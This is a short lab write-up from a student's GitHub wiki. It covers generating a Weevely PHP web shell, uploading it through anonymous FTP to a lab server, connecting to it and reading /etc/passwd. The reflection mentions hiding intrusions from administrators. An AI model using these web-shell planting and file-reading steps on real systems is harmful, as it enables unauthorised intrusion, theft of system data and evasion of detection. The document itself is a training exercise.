Weevely Lab 8.1 - DefiantCoder/Tech-Journals GitHub Wiki

1. weevely generate _YourPassword _~/_DirectoryLocation_/_FileName_.php This makes your weevely php file that will be used to grab passwd in this case

2. use ftp -i 10.0.5.25 to enter pippin, the credentials were anonymous and there was no password

3. The next step was to use cd upload to enter the upload directory where you use put _filename_.php to put your weevely .php file into http://10.0.5.25/upload

4. finally you can use weevely http://10.0.5.25/upload/_FileName_.php _YourPassword_ to enter your weevely session and execute cat /etc/passwd and have an obfuscated output in wireshark

Reflection:

This was an interesting lab where we learned a new tool which can help us keep certain actions private or potentially undetected. I am curious to see how detection software may interact with this program, both with weevely itself and hiding intrusions from Administrators.